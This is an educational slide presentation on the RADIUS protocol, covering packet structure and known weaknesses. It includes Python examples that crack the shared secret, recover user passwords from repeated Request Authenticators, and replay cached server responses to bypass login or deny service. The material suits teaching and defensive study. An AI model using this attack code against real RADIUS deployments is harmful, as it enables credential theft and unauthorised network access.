RADIUS
RADIUS 2
In This Presentation…
Why Do We Need It?
What is RADIUS?
RADIUS Operation
RADIUS Packets
Operation Examples
Attacks on RADIUS
RADIUS’ EAP Support
Why Do We Need It?
- Embedded Network Devices
- Multiple Users & Workstations
- Simple Network Access Servers (NAS)
- Central User Administration
- User Roaming
- Protection Against Sniffing / Active Attacker
What is RADIUS?
Remote Authentication Dial-In User Service
Key Features:
- Client / Server Model
- Network Security
- Flexible Authentication Methods
- Extensible Protocol
De-Facto Standard For Remote Authentication
What is RADIUS?
Placement in the protocol stack:
- Application: RADIUS
- Transport: TCP / UDP (RADIUS runs over UDP)
- IP
- Link
- Physical
RADIUS Operation
Dial-In User --(Dial-In)--> RADIUS Client (NAS - Network Access Server) --(LAN / WAN)--> RADIUS Server
RADIUS Operation
RADIUS Uses UDP. Why?
- Significantly different timing requirements from those TCP is tuned for
- However, retransmission capabilities are still needed, so the client retries on its own timer
- Stateless protocol: clients and servers come and go
- Simplifies server implementation
- Keep-alives considered harmful
RADIUS Operation
Operation Modes:
- User-Name / Password
- Challenge / Response
- Interoperation with PAP and CHAP
- Proxy
RADIUS Packets
Packet layout:
  Code (1 byte) | Identifier (1 byte) | Length (2 bytes)
  Authenticator (16 bytes = 4 words)
  Attributes... (type, length, value triples)
RADIUS Packets
Packet Types:
- Access-Request (code 1)
- Access-Accept (code 2)
- Access-Reject (code 3)
- Access-Challenge (code 11)
RADIUS Packets
The Authenticator
Request Authenticator:
- Unpredictable and unique over the lifetime of a secret
- Used for User-Password hiding: the NUL-padded password is XORed with MD5(Secret + RequestAuth)
Response Authenticator:
- Calculated by an MD5 hash:
  MD5(Code + ID + Length + RequestAuth + Attributes + Secret)
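The packet layout, User-Password hiding and Response Authenticator described on the last three slides, worked through in code. This is an added example written for this page, not code from the presentation or from any RADIUS implementation; the shared secret, user name and password are constructed sample values, and the packet carries only User-Name and User-Password attributes.

```python
import hashlib
import hmac
import os
import struct

# Packet codes and attribute types as defined in RFC 2865.
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT, ACCESS_CHALLENGE = 1, 2, 3, 11
USER_NAME, USER_PASSWORD = 1, 2
HEADER = struct.Struct("!BBH")  # Code, Identifier, Length; the 16-byte Authenticator follows


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def hide_password(password, secret, request_auth):
    """User-Password hiding: NUL-pad to a multiple of 16 bytes, then chain blocks as
    c1 = p1 XOR MD5(S + RA), c2 = p2 XOR MD5(S + c1), ... (previous ciphertext keys the next)."""
    padded = (password + b"\x00" * (-len(password) % 16)) or b"\x00" * 16
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        block = xor_bytes(padded[i:i + 16], hashlib.md5(secret + prev).digest())
        out, prev = out + block, block
    return out


def unhide_password(hidden, secret, request_auth):
    """Server-side inverse of hide_password; trailing NUL padding is stripped."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        out += xor_bytes(hidden[i:i + 16], hashlib.md5(secret + prev).digest())
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def encode_attrs(attrs):
    """attrs is a list of (type, value); each attribute is type, total length, value."""
    return b"".join(bytes([t, len(v) + 2]) + v for t, v in attrs)


def parse_attrs(body):
    attrs, i = [], 0
    while i + 2 <= len(body):
        t, length = body[i], body[i + 1]
        if length < 2 or i + length > len(body):
            raise ValueError("malformed attribute")
        attrs.append((t, body[i + 2:i + length]))
        i += length
    return attrs


def build_access_request(identifier, username, password, secret, request_auth=None):
    """The Request Authenticator must be unpredictable and unique per secret lifetime;
    os.urandom is used here (a weak generator is what the later attack slides exploit)."""
    request_auth = request_auth or os.urandom(16)
    body = encode_attrs([(USER_NAME, username),
                         (USER_PASSWORD, hide_password(password, secret, request_auth))])
    return HEADER.pack(ACCESS_REQUEST, identifier, 20 + len(body)) + request_auth + body


def response_authenticator(code, identifier, request_auth, body, secret):
    """MD5(Code + ID + Length + RequestAuth + Attributes + Secret), exactly as on the slide."""
    header = HEADER.pack(code, identifier, 20 + len(body))
    return hashlib.md5(header + request_auth + body + secret).digest()


def build_response(code, request, attrs, secret):
    identifier, request_auth = request[1], request[4:20]
    body = encode_attrs(attrs)
    auth = response_authenticator(code, identifier, request_auth, body, secret)
    return HEADER.pack(code, identifier, 20 + len(body)) + auth + body


def verify_response(request, response, secret):
    """NAS-side check: the Identifier must match the outstanding request and the Response
    Authenticator must recompute over that request's Request Authenticator."""
    if len(response) < 20:
        return False
    code, identifier, length = HEADER.unpack(response[:4])
    if identifier != request[1] or length != len(response):
        return False
    expected = response_authenticator(code, identifier, request[4:20], response[20:], secret)
    return hmac.compare_digest(expected, response[4:20])


if __name__ == "__main__":
    secret = b"s3cr3t"  # constructed shared secret
    req = build_access_request(7, b"alice", b"hunter2", secret)
    print("Access-Request:", req.hex())
    hidden = dict(parse_attrs(req[20:]))[USER_PASSWORD]
    print("password recovered by server:", unhide_password(hidden, secret, req[4:20]))
    accept = build_response(ACCESS_ACCEPT, req, [], secret)
    print("Access-Accept verifies at NAS:", verify_response(req, accept, secret))
```

Note that verify_response binds the response only to the Identifier and the Request Authenticator: nothing else in the exchange is fresh, which is the property the replay slides later rely on.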
Examples
User Telnet To Specified Host
User Authenticating With CHAP
User With Challenge-Response Card
Attacks On RADIUS
Weaknesses Of The Protocol
Operation Modes:
- User Name / Password Mode
- Challenge / Response Mode
Attacks On RADIUS
Response Authenticator Based Shared Secret Attack
- The attacker listens to requests and server responses, and pre-computes the MD5 state over the prefix of the Response Authenticator input, all of which is visible on the wire:
  MD5(Code + ID + Length + ReqAuth + Attributes)
- Performs an exhaustive search on the shared secret, appending each candidate to the saved MD5 state instead of hashing from scratch.
- Many implementations receive the shared secret as an ASCII string typed at a keyboard and limit its size to 16 bytes, which keeps the keyspace small.
Attacks On RADIUS
User-Password Attribute Based Shared Secret Attack
- The attacker attempts a connection to the NAS with a password of his choosing, and intercepts the Access-Request.
- XORs the User-Password attribute with the (NUL-padded) password he used to obtain:
  MD5(Secret + ReqAuth)
- Performs an exhaustive search on the shared secret. Here the secret is the first MD5 input, so no state can be pre-computed and every candidate costs a full hash.
- Even before the secret is found, this MD5 value is useful for other attacks: it is the mask for every password hidden under the same ReqAuth.
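Both shared-secret attacks from the last two slides, as an added example written for this page (not code from the presentation). The sniffed Access-Request and Access-Accept are constructed in build_capture with a sample secret, Request Authenticator and a one-block password; the word list is constructed too. The Response Authenticator attack uses hashlib's copy() to resume from the pre-computed prefix state, which is exactly the saving the slide describes; the User-Password attack cannot do that.

```python
import hashlib
import itertools
import string
import struct


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def find_attr(body, wanted):
    """Return the value of the first attribute of the given type, or None."""
    i = 0
    while i + 2 <= len(body):
        t, length = body[i], body[i + 1]
        if length < 2:
            break
        if t == wanted:
            return body[i + 2:i + length]
        i += length
    return None


def build_capture(secret, request_auth, password, identifier=7):
    """Constructed stand-in for a sniffed exchange: an Access-Request carrying a single
    16-byte block of hidden User-Password, and the server's Access-Accept (no attributes)."""
    padded = (password + b"\x00" * 16)[:16]
    hidden = xor_bytes(padded, hashlib.md5(secret + request_auth).digest())
    attrs = bytes([1, 7]) + b"alice" + bytes([2, 18]) + hidden
    request = struct.pack("!BBH", 1, identifier, 20 + len(attrs)) + request_auth + attrs
    hdr = struct.pack("!BBH", 2, identifier, 20)
    response = hdr + hashlib.md5(hdr + request_auth + secret).digest()
    return request, response


def crack_secret_from_response(request, response, candidates):
    """Response Authenticator based attack. Code, ID, Length, ReqAuth and Attributes all
    precede the secret in the MD5 input, so the state over that prefix is computed once;
    each candidate only pays for the tail of one MD5."""
    prefix = hashlib.md5(response[:4] + request[4:20] + response[20:])
    target = response[4:20]
    for secret in candidates:
        h = prefix.copy()  # resume from the shared prefix state
        h.update(secret)
        if h.digest() == target:
            return secret
    return None


def recover_mask(request, known_password):
    """User-Password attribute based attack, step 1: the attacker logged in with a password
    he knows, so XORing it back out of the attribute leaves MD5(Secret + ReqAuth)."""
    hidden = find_attr(request[20:], 2)[:16]
    return xor_bytes(hidden, (known_password + b"\x00" * 16)[:16])


def crack_secret_from_mask(request, mask, candidates):
    """Step 2: brute force the secret. It is the first MD5 input, so nothing can be shared
    between candidates; every guess is a full MD5 over secret + ReqAuth."""
    request_auth = request[4:20]
    for secret in candidates:
        if hashlib.md5(secret + request_auth).digest() == mask:
            return secret
    return None


def short_ascii_secrets(max_len, alphabet=string.ascii_lowercase + string.digits):
    """Exhaustive keyspace of short keyboard-typed secrets (the slide notes a 16-byte cap)."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet.encode(), repeat=n):
            yield bytes(tup)


if __name__ == "__main__":
    secret, ra = b"s3cr3t", bytes(range(16))  # constructed
    req, resp = build_capture(secret, ra, b"hunter2")
    wordlist = [b"radius", b"password", b"s3cr3t", b"testing123"]  # constructed
    print("via Response Authenticator:", crack_secret_from_response(req, resp, wordlist))
    mask = recover_mask(req, b"hunter2")
    print("via User-Password attribute:", crack_secret_from_mask(req, mask, wordlist))
```

In practice the candidate generator is the whole printable-ASCII space up to the implementation's length cap rather than a word list; short_ascii_secrets shows the shape of that loop for a small alphabet.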
Attacks On RADIUS
User-Password Based Password Attack
- The attacker attempts a connection to the NAS, intercepts the Access-Request and computes MD5(Secret + ReqAuth) as on the previous slide.
- Performs an exhaustive / dictionary attack on the victim's password, XORing each guess with the above MD5 and sending it in the User-Password attribute of a new Access-Request each time, reusing the same ReqAuth.
- Bypasses any login-attempt restriction imposed by the NAS, since the attacker submits the Access-Requests himself.
- Possible because there is no authentication on Access-Request packets.
Attacks On RADIUS
Request Authenticator Based Attacks
Possible due to bad implementations:
- Poor pseudo-random number generator (Request Authenticators repeat)
- Predictable Request ID
Attacks On RADIUS
Request Authenticator Based Attacks
Passive User-Password Compromise through Repeated Request Authenticators
- The attacker builds a dictionary of ReqAuth values and the User-Password attributes sent by the NAS under each.
- When a ReqAuth repeats, both attributes were masked with the same MD5(Secret + ReqAuth), so XORing the two User-Password attributes cancels the mask and yields:
  password1 XOR password2
- Perform a dictionary attack, helped by the fact that the shorter password is NUL-padded to 16 bytes: beyond its end, the longer password's characters are XORed with zeros and so appear unchanged.
Attacks On RADIUS
Request Authenticator Based Attacks
Active User-Password Compromise through Repeated Request Authenticators
- The attacker builds a dictionary as before.
- When he predicts that he can cause the NAS to use a ReqAuth already in the dictionary, he connects and intercepts his own Access-Request.
- Calculates "password1 XOR password2" as before, but this time password2 is his own and known, so the user's password is recovered outright.
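The passive and active repeated-ReqAuth attacks from the last two slides, as an added example written for this page (not the presentation's code). The NAS's repeated Request Authenticator, the shared secret, the two victims' passwords and the attacker's own password are constructed; only single-block (at most 16-byte) passwords are handled, which is enough to show both the mask cancellation and the NUL-padding leak.

```python
import hashlib

PRINTABLE = set(range(0x20, 0x7F))  # printable ASCII, no control bytes


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def pad16(password):
    return (password + b"\x00" * 16)[:16]  # one-block passwords only, for brevity


def hide_first_block(password, secret, request_auth):
    """First block of RFC 2865 User-Password hiding: pad(p) XOR MD5(Secret + ReqAuth)."""
    return xor_bytes(pad16(password), hashlib.md5(secret + request_auth).digest())


def plausible_password(candidate):
    """A decrypted guess is only credible if it is printable text followed by NUL padding.
    Returns the stripped text, or something falsy."""
    text = candidate.rstrip(b"\x00")
    return b"\x00" not in text and all(c in PRINTABLE for c in text) and text


def passive_attack(hidden_a, hidden_b, dictionary):
    """Two User-Password attributes hidden under the same Request Authenticator share one
    mask, so their XOR is pad(pA) XOR pad(pB): the secret-derived mask is gone. Where the
    shorter password has already ended its padding is NUL, so those bytes of the XOR are
    the longer password's characters in the clear. Returns (guess, partner) pairs for
    dictionary words whose implied partner also looks like a password."""
    x = xor_bytes(hidden_a, hidden_b)
    found = []
    for guess in dictionary:
        partner = xor_bytes(x, pad16(guess))
        text = plausible_password(partner)
        if text:
            found.append((guess, text))
    return found


def active_attack(hidden_victim, hidden_attacker, attacker_password):
    """The attacker got the NAS to reuse the victim's Request Authenticator for his own
    login, so one side of the XOR is known and the victim's password falls out directly."""
    x = xor_bytes(hidden_victim, hidden_attacker)
    return xor_bytes(x, pad16(attacker_password)).rstrip(b"\x00")


if __name__ == "__main__":
    secret = b"s3cr3t"
    ra = bytes(range(16))  # constructed: the NAS's broken PRNG hands out this value again
    alice = hide_first_block(b"letmein", secret, ra)
    bob = hide_first_block(b"correcthorse", secret, ra)
    print("tail leaked in the clear:", xor_bytes(alice, bob)[len(b"letmein"):].rstrip(b"\x00"))
    words = [b"password", b"letmein", b"qwerty", b"correcthorse"]  # constructed word list
    print("passive:", passive_attack(alice, bob, words))
    mallory = hide_first_block(b"hunter2", secret, ra)  # attacker's own login, same ReqAuth
    print("active :", active_attack(bob, mallory, b"hunter2"))
```

The printable-text filter is what makes the passive dictionary attack workable: most wrong guesses imply a partner containing control bytes or NULs in the middle, and are discarded without any knowledge of the secret.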
Attacks On RADIUS
Request Authenticator Based Attacks
Replay of Server Responses through Repeated Request Authenticators
- The attacker builds a dictionary of ReqAuth, ID and the entire server response. Most server responses will be Access-Accept.
- The attacker attempts a connection to the NAS, predicting the ReqAuth and ID it will use, intercepts the Access-Request, and injects the dictionary entry with the same ReqAuth and ID: an Access-Accept whose Response Authenticator still verifies, because the NAS checks nothing beyond those two values and the secret.
Attacks On RADIUS
Request Authenticator Based Attacks
DoS Arising from the Prediction of the Request Authenticator
- Much like the previous attack.
- This time the attacker connects to the NAS many times with bad credentials, building the same dictionary as before, only now filled with Access-Rejects.
- When a legitimate user tries to connect and the NAS reuses a ReqAuth from the dictionary, the attacker injects his Access-Reject, causing a denial of service.
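The replay and DoS attacks from the last two slides, as an added example written for this page (not code from the presentation). WeakNAS is a constructed client whose Request Authenticator generator has period 4 and whose Identifier wraps in step with it; nas_accepts is the check a NAS can actually perform on an incoming response. The example shows that once an (Identifier, ReqAuth) pair recurs, a cached Access-Accept or Access-Reject from the attacker's table verifies without the server being involved.

```python
import hashlib
import struct

HEADER = struct.Struct("!BBH")
ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3


def response_authenticator(code, identifier, request_auth, attrs, secret):
    """MD5(Code + ID + Length + ReqAuth + Attributes + Secret) as on the authenticator slide."""
    header = HEADER.pack(code, identifier, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def build_response(code, identifier, request_auth, attrs, secret):
    auth = response_authenticator(code, identifier, request_auth, attrs, secret)
    return HEADER.pack(code, identifier, 20 + len(attrs)) + auth + attrs


def nas_accepts(identifier, request_auth, response, secret):
    """Everything a NAS can check on a response: the Identifier matches a pending request and
    the Response Authenticator recomputes over that request's Request Authenticator. The only
    freshness comes from ReqAuth, so whenever it repeats, every old response is valid again."""
    if len(response) < 20:
        return False
    code, rid, length = HEADER.unpack(response[:4])
    if rid != identifier or length != len(response):
        return False
    return response_authenticator(code, rid, request_auth, response[20:], secret) == response[4:20]


class WeakNAS:
    """Constructed NAS: a period-4 'random' Request Authenticator and an Identifier that wraps
    in step with it, so (Identifier, ReqAuth) pairs recur every four requests."""

    def __init__(self):
        self.counter = 0

    def next_request(self):
        n = self.counter % 4
        self.counter += 1
        return n, hashlib.md5(b"weak-seed" + bytes([n])).digest()


class ReplayDictionary:
    """The attacker's table from the replay and DoS slides: (Identifier, ReqAuth) -> response."""

    def __init__(self):
        self.seen = {}

    def observe(self, identifier, request_auth, response):
        self.seen[(identifier, request_auth)] = response

    def inject(self, identifier, request_auth):
        return self.seen.get((identifier, request_auth))


def run_replay(nas, secret, observed_code):
    """Phase 1: record four server responses of the given code (Access-Accept for the replay,
    Access-Reject for the DoS variant). Phase 2: on the next request the NAS recycles an old
    (ID, ReqAuth) and the cached response passes nas_accepts with the server never consulted.
    Returns (a cached response was found, the NAS accepted it)."""
    table = ReplayDictionary()
    for _ in range(4):
        rid, ra = nas.next_request()
        table.observe(rid, ra, build_response(observed_code, rid, ra, b"", secret))
    rid, ra = nas.next_request()  # the victim's request
    forged = table.inject(rid, ra)
    return forged is not None, forged is not None and nas_accepts(rid, ra, forged, secret)


if __name__ == "__main__":
    secret = b"s3cr3t"  # constructed shared secret; the attacker never learns it
    print("replay cached Access-Accept:", run_replay(WeakNAS(), secret, ACCESS_ACCEPT))
    print("inject cached Access-Reject (DoS):", run_replay(WeakNAS(), secret, ACCESS_REJECT))
```

Nothing in run_replay uses the secret on the attacker's side: the table is filled from traffic alone, and the defence is entirely in the quality of the NAS's Request Authenticator generator.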
Attacks On RADIUS
Summary
- User-Password Protection Technique
- The Response-Authenticator
- Access-Request Packets
- Random Number Generators
- Shared Secrets
RADIUS’ EAP Support
RADIUS-Encapsulated EAP Packets
Proprietary Protocol Between RADIUS Server and Backend Security Server
Proxied RADIUS requests
Retransmission and Fragmentation Issues
RADIUS’ EAP Support
Security Considerations:
- Separation of EAP Server and PPP Authenticator
- Connection Hijacking
- Man-in-the-Middle Attack
- Multiple Databases
- Negotiation Attacks
Conclusion
- RADIUS is a remote authentication protocol.
- RADIUS is a de-facto standard for remote authentication.
- RADIUS has several weaknesses.
- RADIUS is an extensible protocol, and can support many authentication methods (e.g. EAP).
What Next?
Diameter:
"Diameter clients, such as Network Access Servers (NASes) and Foreign Agents MUST support IP Security, and MAY support TLS. Diameter servers MUST support TLS, but the administrator MAY opt to configure IPSec instead of using TLS. Operating the Diameter protocol without any security mechanism is not recommended."
Questions?